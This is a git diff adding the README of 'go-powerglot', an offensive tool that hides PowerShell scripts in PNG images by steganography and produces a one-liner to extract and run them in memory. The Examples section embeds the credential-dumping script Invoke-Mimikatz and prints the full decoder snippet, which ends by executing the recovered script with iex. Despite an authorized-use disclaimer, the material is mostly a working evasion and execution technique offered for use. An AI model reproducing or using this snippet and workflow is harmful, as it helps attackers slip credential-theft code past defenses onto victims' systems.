diff options
Diffstat (limited to 'README.md')
| -rw-r--r-- | README.md | 108 |
1 files changed, 108 insertions, 0 deletions
diff --git a/README.md b/README.md new file mode 100644 index 0000000..72c28a8 --- /dev/null +++ b/README.md @@ -0,0 +1,108 @@ +# go-powerglot + +`go-powerglot` is an offensive security utility that embeds PowerShell scripts into PNG images using pixel-level steganography. It transforms ordinary PNG files into covert script carriers and provides a one-liner PowerShell payload for in-memory script extraction and execution. Inspired by [https://github.com/peewpw/Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage) + +> **WARNING**: This tool is intended for **authorized security assessments only**. Misuse may violate laws or regulations. The author disclaims any responsibility for unlawful use. Always obtain explicit permission before conducting any security tests. + +## Features + +- **Steganography**: Embeds PowerShell script bytes into image pixels using RGB channel manipulation. +- **PowerShell Payload Generator**: Automatically generates a one-liner that decodes and executes the script from the PNG image. +- **Portable**: Single binary with no external dependencies beyond Go's standard library. +- **File Size & Dimension Checks**: Ensures the image has sufficient capacity to store the entire script. + +## Installation + +### Prerequisites + +- **Go**: Version 1.21 or later. +- **Make**: For building with the provided Makefile. +- **Git**: To clone the repository. + +### Steps + +- Clone the repository: + +``` +$ git clone https://cgit.heqnx.com/go-powerglot +$ cd go-powerglot +``` + +- Install dependencies: + +``` +$ go mod tidy +``` + +- Build for all platforms: + +``` +$ make all +``` + +- Binaries will be generated in the build/ directory for Linux, Windows, and macOS; alternatively, build for a specific platform: + +``` +$ make linux-amd64 +$ make windows-amd64 +$ make darwin-arm64 +``` + +- (Optional) Run directly with Go: + +``` +$ go run main.go -exec </path/to/png> -image </path/to/input.png> -out </path/to/out.png> -script </path/to/input.ps1> +``` + +## Usage + +### Command-Line Flags + +``` +Usage of ./go-powerglot: + -exec string + execution path to be used inside the generated PowerShell one-liner + -image string + input PNG file to embed the script into + -out string + output PNG file with embedded script + -script string + PowerShell script file to embed +``` + +## Examples + +### Embed a PowerShell script into a PNG and generate a decoder: + +``` +$ ./go-powerglot \ + -image img/windows-11-5689x2400.png \ + -script Invoke-Mimikatz.ps1 \ + -out test.png \ + -exec C:\Users\Public\test.png +``` + +- Example output: + +``` +[inf] script size: 3625037 bytes +[inf] image size: 2702073 bytes +[inf] png dimensions: 5689x2400 +[inf] created output file: /home/heqnx/go-powerglot/test.png +[inf] successfully embedded Invoke-Mimikatz.ps1 into test.png +[inf] powershell decoder snippet: +sal a new-object;add-type -a system.drawing;$g=a system.drawing.bitmap("C:\Users\Public\test.png");$o=a byte[] 13653600;(0..2399)|%{foreach($x in 0..5688) {$p=$g.getpixel($x,$_);$o[$_*5689+$x]=[math]::floor(($p.r -band 0x0f)*16) + ($p.g -band 0x0f);}};$g.dispose();iex([system.text.encoding]::ascii.getstring($o[0..3625036])) +``` + +- Use the generated PowerShell snippet to decode and execute the embedded script: + +- The PowerShell snippet uses pixel decoding logic to reconstruct the original script in memory and execute it using `iex`. + +## Disclaimer + +`go-powerglot` is provided "as is" without any warranties. The author and contributors are not responsible for damages or misuse. This tool is for research and authorized red team operations only. + +## License + +This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the [LICENSE](LICENSE) file for more details. + |